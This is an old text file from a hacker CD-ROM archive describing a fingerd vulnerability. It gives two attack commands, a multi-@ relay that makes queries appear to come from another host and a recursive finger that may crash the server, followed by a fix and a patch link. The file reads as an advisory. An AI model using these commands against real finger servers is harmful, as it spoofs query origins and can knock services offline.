home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / finger_attack.txt < prev    next >
Encoding:
Text File  |  2001-11-06  |  717 b   |  28 lines
  1.  
  2.                                fingerd Exploit
  3.  
  4.  
  5. Platform:     Any running a non-pathed fingerd
  6.  
  7. Description:
  8.               Remote finger'ing allowd multiple @'s, and allows bogus
  9.               finger commands.
  10.  
  11. Exploit:      By using several logins you can make it appear like a user
  12.               on hut.fi is using finger on a user at nonhut.fi like this:
  13.  
  14.               >finger jabba@hut.fi@nonhut.fi
  15.  
  16.               This may cause a server to crash by using recursive finger
  17.               like this:
  18.  
  19.               >finger jabba@@@@@@@@@@@hut.fi
  20.  
  21. Fix:
  22.               Remove finger form inetd.conf and kill it.
  23.  
  24. Patch?:
  25.               http://prep.ai.mit.edu/pub/gnu/finger-1.37.tar.gz
  26.  
  27. Source:       Dont remember.
  28.